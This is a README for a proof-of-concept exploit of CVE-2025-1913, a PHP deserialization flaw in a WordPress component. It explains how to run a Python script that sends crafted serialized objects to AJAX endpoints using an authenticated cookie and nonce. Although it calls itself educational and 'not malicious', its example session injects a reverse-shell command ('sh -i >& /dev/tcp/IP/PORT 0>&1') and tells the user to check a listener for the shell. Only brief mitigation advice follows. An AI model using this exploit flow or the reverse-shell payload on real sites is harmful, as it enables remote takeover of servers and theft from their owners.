# CVE-2025-1913 -- Proof of Concept (PoC)

This repository contains an **educational-only** Proof of Concept (PoC)
for **CVE-2025-1913**, created by **Suhaib518 🇸🇦**.
This PoC demonstrates how specially crafted serialized PHP input may
trigger vulnerable logic in affected WordPress components.
The PoC is safe and does **not** include harmful payloads.

> ⚠️ **Disclaimer:**
> This PoC is for **learning, research, and defensive security testing
> only**.
> Do **NOT** use it on servers you do not own or have explicit
> permission to test.

------------------------------------------------------------------------

## 📌 Overview

The vulnerability exists due to unsafe handling of PHP serialized data
in certain WordPress plugin workflows.
This PoC shows how an attacker could supply crafted serialized
structures that cause unintended internal behavior.

This repository includes a Python script that:

-   Builds custom serialized PHP objects
-   Encodes them for WordPress AJAX-based export endpoints
-   Sends a controlled request to demonstrate the issue safely

------------------------------------------------------------------------

## 📂 Files in This Repository

    .
    ├── CVE-2025-1913-PoC.py         # The PoC script created by Suhaib518 KSA
    └── README.md                    # Documentation

------------------------------------------------------------------------

## 🚀 Usage

### 1. Install Requirements

The script uses only built-in Python modules except for **requests**:

``` bash
pip install requests
```

### 2. Run the interactive exploit script

``` bash
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
```

You will be asked:

-   How many properties to include
-   The name/value for each property

The script will then serialize them, build a WordPress request, and send
it.

------------------------------------------------------------------------

## ✔️ Example Command (Successful Exploitation Flow)

Below is an example command demonstrating usage with example values
(these are **not malicious**, only showing the process):

``` bash
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
```

Example answers to the interactive questions:

    [?] How many properties does this class have? 2
    [?] Name of property #1: file
    [?] Value for 'file': shell.sh
    [?] Name of property #2: shell
    [?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

The script will then print:

    [*] Sending request…
    ....Check the listener for the shell.

------------------------------------------------------------------------

## 🛡️ Mitigation (High-Level)

-   Avoid using `unserialize()` on untrusted input
-   Validate all form parameters and AJAX requests
-   Keep plugins updated
-   Use modern data formats such as JSON instead of PHP serialization

------------------------------------------------------------------------

## 📜 License

MIT License.

------------------------------------------------------------------------

## 🙌 Author

Created by Suhaib518 🇸🇦.
